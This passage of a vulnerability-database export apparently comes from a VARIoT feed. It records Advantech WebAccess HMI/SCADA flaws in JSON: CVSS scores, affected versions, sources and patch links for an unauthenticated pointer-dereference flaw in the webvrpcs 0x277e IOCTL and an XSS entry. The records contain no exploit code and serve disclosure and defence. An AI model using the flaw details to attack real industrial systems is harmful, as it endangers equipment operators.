"ZDI-17-562", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19443", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-562", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19443", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess RtspVapgDecoderNew2 PMSettingData3D High Stack Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684" }, { "db": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2017-19443" } ], "trust": 1.0 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "d5474ef5-dad6-4722-bd07-e73257c4f684" }, { "db": "IVD", "id": "7d74524f-463f-11e9-b2e4-000c29342cb1" } ], "trust": 0.4 } }
var-201805-1142
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several untrusted pointer dereference vulnerabilities have been identified, which may allow an attacker to execute arbitrary code. plural Advantech WebAccess The product includes NULL A vulnerability related to pointer dereference exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x277e IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess node", "scope": null, "trust": 5.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess scada node", "scope": "lt", "trust": 1.6, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "2.0.15" }, { "_id": null, "model": "webaccess \u003c=8.2 20170817", "scope": null, "trust": 0.8, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "\u003c=8.3.0" }, { "_id": null, "model": "webaccess dashboard", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "_id": null, "model": "webaccess/nms", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0.3" }, { "_id": null, "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess scada node", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess dashboard", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess 8.2 20170817", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" } ], "sources": [ { "db": "IVD", "id": "e2f1a971-39ab-11e9-8038-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-526" }, { "db": "ZDI", "id": "ZDI-18-484" }, { "db": "ZDI", "id": "ZDI-18-491" }, { "db": "ZDI", "id": "ZDI-18-492" }, { "db": "ZDI", "id": "ZDI-18-494" }, { "db": "ZDI", "id": "ZDI-18-496" }, { "db": "ZDI", "id": "ZDI-18-493" }, { "db": "ZDI", "id": "ZDI-18-495" }, { "db": "CNVD", "id": "CNVD-2018-10813" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005071" }, { "db": "CNNVD", "id": "CNNVD-201805-447" }, { "db": "NVD", "id": "CVE-2018-7497" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_dashboard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_scada", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess%2fnms", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005071" } ] }, "credits": { "_id": null, "data": "Steven Seeley (mr_me) of Offensive Security", "sources": [ { "db": "ZDI", "id": "ZDI-18-526" }, { "db": "ZDI", "id": "ZDI-18-491" }, { "db": "ZDI", "id": "ZDI-18-492" }, { "db": "ZDI", "id": "ZDI-18-494" }, { "db": "ZDI", "id": "ZDI-18-496" }, { "db": "ZDI", "id": "ZDI-18-493" }, { "db": "ZDI", "id": "ZDI-18-495" } ], "trust": 4.9 }, "cve": "CVE-2018-7497", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2018-7497", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 5.6, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-7497", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 6.5, "id": "CNVD-2018-10813", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 6.5, "id": "e2f1a971-39ab-11e9-8038-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-137529", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-7497", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2018-7497", "trust": 5.6, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2018-7497", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2018-7497", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2018-10813", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201805-447", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "e2f1a971-39ab-11e9-8038-000c29342cb1", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-137529", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2f1a971-39ab-11e9-8038-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-526" }, { "db": "ZDI", "id": "ZDI-18-484" }, { "db": "ZDI", "id": "ZDI-18-491" }, { "db": "ZDI", "id": "ZDI-18-492" }, { "db": "ZDI", "id": "ZDI-18-494" }, { "db": "ZDI", "id": "ZDI-18-496" }, { "db": "ZDI", "id": "ZDI-18-493" }, { "db": "ZDI", "id": "ZDI-18-495" }, { "db": "CNVD", "id": "CNVD-2018-10813" }, { "db": "VULHUB", "id": "VHN-137529" }, { "db": "JVNDB", "id": "JVNDB-2018-005071" }, { "db": "CNNVD", "id": "CNNVD-201805-447" }, { "db": "NVD", "id": "CVE-2018-7497" } ] }, "description": { "_id": null, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several untrusted pointer dereference vulnerabilities have been identified, which may allow an attacker to execute arbitrary code. plural Advantech WebAccess The product includes NULL A vulnerability related to pointer dereference exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x277e IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. Multiple SQL-injection vulnerabilities\n2. An information-disclosure vulnerability\n3. A file-upload vulnerability\n4. Multiple directory-traversal vulnerabilities\n5. Multiple stack-based buffer-overflow vulnerabilities\n6. A heap-based buffer-overflow vulnerability\n7. Multiple arbitrary code-execution vulnerabilities\n8. A denial-of-service vulnerability\n9. A security-bypass vulnerability\n10. A privilege-escalation vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier", "sources": [ { "db": "NVD", "id": "CVE-2018-7497" }, { "db": "JVNDB", "id": "JVNDB-2018-005071" }, { "db": "ZDI", "id": "ZDI-18-526" }, { "db": "ZDI", "id": "ZDI-18-484" }, { "db": "ZDI", "id": "ZDI-18-491" }, { "db": "ZDI", "id": "ZDI-18-492" }, { "db": "ZDI", "id": "ZDI-18-494" }, { "db": "ZDI", "id": "ZDI-18-496" }, { "db": "ZDI", "id": "ZDI-18-493" }, { "db": "ZDI", "id": "ZDI-18-495" }, { "db": "CNVD", "id": "CNVD-2018-10813" }, { "db": "BID", "id": "104190" }, { "db": "IVD", "id": "e2f1a971-39ab-11e9-8038-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-137529" } ], "trust": 7.74 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2018-7497", "trust": 9.2 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 3.4 }, { "db": "BID", "id": "104190", "trust": 2.6 }, { "db": "CNVD", "id": "CNVD-2018-10813", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201805-447", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-005071", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5711", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-526", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5648", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-484", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5655", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-491", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5656", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-492", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5659", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-494", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5661", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-496", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5658", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-493", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5660", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-495", "trust": 0.7 }, { "db": "IVD", "id": "E2F1A971-39AB-11E9-8038-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-137529", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2f1a971-39ab-11e9-8038-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-526" }, { "db": "ZDI", "id": "ZDI-18-484" }, { "db": "ZDI", "id": "ZDI-18-491" }, { "db": "ZDI", "id": "ZDI-18-492" }, { "db": "ZDI", "id": "ZDI-18-494" }, { "db": "ZDI", "id": "ZDI-18-496" }, { "db": "ZDI", "id": "ZDI-18-493" }, { "db": "ZDI", "id": "ZDI-18-495" }, { "db": "CNVD", "id": "CNVD-2018-10813" }, { "db": "VULHUB", "id": "VHN-137529" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005071" }, { "db": "CNNVD", "id": "CNNVD-201805-447" }, { "db": "NVD", "id": "CVE-2018-7497" } ] }, "id": "VAR-201805-1142", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2f1a971-39ab-11e9-8038-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10813" }, { "db": "VULHUB", "id": "VHN-137529" } ], "trust": 1.5434040525000001 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f1a971-39ab-11e9-8038-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-10813" } ] }, "last_update_date": "2024-11-23T21:53:07.367000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 5.6, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" }, { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Advantech WebAccess Untrusted Pointer Dereference Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/130861" }, { "title": "Multiple Advantech Product security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80057" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-526" }, { "db": "ZDI", "id": "ZDI-18-484" }, { "db": "ZDI", "id": "ZDI-18-491" }, { "db": "ZDI", "id": "ZDI-18-492" }, { "db": "ZDI", "id": "ZDI-18-494" }, { "db": "ZDI", "id": "ZDI-18-496" }, { "db": "ZDI", "id": "ZDI-18-493" }, { "db": "ZDI", "id": "ZDI-18-495" }, { "db": "CNVD", "id": "CNVD-2018-10813" }, { "db": "JVNDB", "id": "JVNDB-2018-005071" }, { "db": "CNNVD", "id": "CNNVD-201805-447" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-476", "trust": 1.9 }, { "problemtype": "CWE-822", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-137529" }, { "db": "JVNDB", "id": "JVNDB-2018-005071" }, { "db": "NVD", "id": "CVE-2018-7497" } ] }, "references": { "_id": null, "data": [ { "trust": 9.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/104190" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7497" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7497" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-526" }, { "db": "ZDI", "id": "ZDI-18-484" }, { "db": "ZDI", "id": "ZDI-18-491" }, { "db": "ZDI", "id": "ZDI-18-492" }, { "db": "ZDI", "id": "ZDI-18-494" }, { "db": "ZDI", "id": "ZDI-18-496" }, { "db": "ZDI", "id": "ZDI-18-493" }, { "db": "ZDI", "id": "ZDI-18-495" }, { "db": "CNVD", "id": "CNVD-2018-10813" }, { "db": "VULHUB", "id": "VHN-137529" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005071" }, { "db": "CNNVD", "id": "CNNVD-201805-447" }, { "db": "NVD", "id": "CVE-2018-7497" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2f1a971-39ab-11e9-8038-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-526", "ident": null }, { "db": "ZDI", "id": "ZDI-18-484", "ident": null }, { "db": "ZDI", "id": "ZDI-18-491", "ident": null }, { "db": "ZDI", "id": "ZDI-18-492", "ident": null }, { "db": "ZDI", "id": "ZDI-18-494", "ident": null }, { "db": "ZDI", "id": "ZDI-18-496", "ident": null }, { "db": "ZDI", "id": "ZDI-18-493", "ident": null }, { "db": "ZDI", "id": "ZDI-18-495", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-10813", "ident": null }, { "db": "VULHUB", "id": "VHN-137529", "ident": null }, { "db": "BID", "id": "104190", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2018-005071", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201805-447", "ident": null }, { "db": "NVD", "id": "CVE-2018-7497", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-06-01T00:00:00", "db": "IVD", "id": "e2f1a971-39ab-11e9-8038-000c29342cb1", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-526", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-484", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-491", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-492", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-494", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-496", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-493", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-495", "ident": null }, { "date": "2018-06-01T00:00:00", "db": "CNVD", "id": "CNVD-2018-10813", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "VULHUB", "id": "VHN-137529", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005071", "ident": null }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-447", "ident": null }, { "date": "2018-05-15T22:29:00.457000", "db": "NVD", "id": "CVE-2018-7497", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-526", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-484", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-491", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-492", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-494", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-496", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-493", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-495", "ident": null }, { "date": "2018-06-01T00:00:00", "db": "CNVD", "id": "CNVD-2018-10813", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-137529", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005071", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-447", "ident": null }, { "date": "2024-11-21T04:12:14.833000", "db": "NVD", "id": "CVE-2018-7497", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-447" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Node webvrpcs drawsrv Untrusted Pointer Dereference Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-18-526" }, { "db": "ZDI", "id": "ZDI-18-491" }, { "db": "ZDI", "id": "ZDI-18-492" }, { "db": "ZDI", "id": "ZDI-18-494" }, { "db": "ZDI", "id": "ZDI-18-496" }, { "db": "ZDI", "id": "ZDI-18-493" }, { "db": "ZDI", "id": "ZDI-18-495" } ], "trust": 4.9 }, "type": { "_id": null, "data": "Code problem", "sources": [ { "db": "IVD", "id": "e2f1a971-39ab-11e9-8038-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201805-447" } ], "trust": 0.8 } }
var-201308-0031
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in Advantech WebAccess (formerly BroadWin WebAccess) before 7.1 2013.05.30 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess HMI/SCADA has an unidentified cross-site script. Advantech WebAccess HMI/SCADA is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Advantech WebAccess HMI/SCADA 7.0 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201308-0031", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.1 2013.05.30" }, { "model": "webaccess hmi/scada software", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.0-2012.12.05" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "bd2522e8-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2013-00217" }, { "db": "JVNDB", "id": "JVNDB-2013-003848" }, { "db": "CNNVD", "id": "CNNVD-201301-127" }, { "db": "NVD", "id": "CVE-2013-2299" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-003848" } ] }, "credits": { "@context": 